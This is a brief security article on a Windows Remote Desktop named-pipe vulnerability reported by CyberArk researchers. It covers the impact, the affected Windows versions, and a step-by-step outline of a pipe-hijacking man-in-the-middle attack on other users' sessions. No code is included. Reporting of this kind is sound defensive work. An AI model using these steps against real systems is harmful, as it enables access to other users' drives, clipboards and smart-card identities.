This vulnerability enables any standard unprivileged user connected to a remote machine via remote desktop to gain file system access to the client machines of other connected users, to view and modify clipboard data of other connected users, and to impersonate the identity of other users logged on to the machine using smart cards.
This could lead to data privacy issues, lateral movement and privilege escalation.
Affected Operating Systems
According to CyberArk’s researchers: “The latest versions of Windows (client and server editions) are affected by this vulnerability, and it goes back at least to Windows Server 2012 R2, so we can say that the majority of Windows versions in use today are affected.”
Basic Attack Description
- An attacker connects to a remote machine via RDP
- The attacker lists the open named pipes and finds the full name of the TSVCPIPE pipe
- The attacker creates a pipe server instance with the same name and waits for a new connection
- Once a new connection arrives, RDS creates its own pipe server instance for the session and a pipe client that will attempt to connect to it
- Because of the FIFO, the pipe client will connect to the attacker pipe server instance instead of the one created by the RDS service
- The attacker connects as a client to the real RDS pipe server instance
- The attacker holds both ends of the connection, they can act as man-in-the-middle, passing the data back and forth, viewing and (optionally) modifying it
CyberArk has created a tool that performs these steps to create a man-in-the-middle that prints the data passing through the pipes for demonstration purposes.
The security researchers targeted the device redirection channel (RDPDR) which is used for redirecting devices such as drives and smart cards from the client machine to the remote session. This makes possible for attackers to access other user’s redirected drives and smart-card information.